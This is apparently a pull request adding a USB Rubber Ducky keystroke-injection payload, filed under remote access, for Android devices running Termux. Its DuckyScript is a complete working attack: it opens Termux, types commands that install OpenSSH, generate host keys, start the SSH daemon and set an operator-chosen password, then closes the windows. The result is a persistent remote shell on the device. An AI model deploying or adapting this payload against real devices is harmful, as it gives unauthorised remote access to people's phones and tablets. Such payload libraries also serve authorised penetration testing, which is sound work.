### PR TITLE
Enable SSH - Android Payload

### DIFF
--- a/payloads/library/remote_access/EnableSSH-Android/payload.txt
+++ b/payloads/library/remote_access/EnableSSH-Android/payload.txt
@@ -1,0 +1,30 @@
+REM       Enable SSH - Android
+REM       Version 1.0
+REM       OS: Android
+REM       Author: KryptoKola
+REM	    Requirements: RubberDucky, Android Device with Termux Installed
+REM       Description: This payload will install and run OpenSSH on Android devices with Termux installed. (Termux should be installed from F-droid for best results).
+REM	    Configuration: Place a password in the "NewPasswordHere" and "ConfirmPasswordHere" fields below.
+
+ATTACKMODE HID
+DELAY 500
+GUI f
+DELAY 1000
+STRING termux
+DELAY 500
+TAB
+DELAY 100
+TAB
+DELAY 500
+ENTER
+DELAY 1500
+STRINGLN pkg update -y;pkg install root-repo -y;pkg install openssh -y;ssh-keygen -A;sshd;passwd;
+DELAY 20000
+STRINGLN NewPasswordHere
+DELAY 500
+STRINGLN ConfirmPasswordHere
+DELAY 500
+ALT F4
+DELAY 100
+ALT F4
+DELAY 500


### PR DESCRIPTION
This payload will Enable SSH on an android device with Termux installed. Termux should be installed through F-Droid for best results (this will ensure the correct repos are in use). This has been tested with android tablets and phones.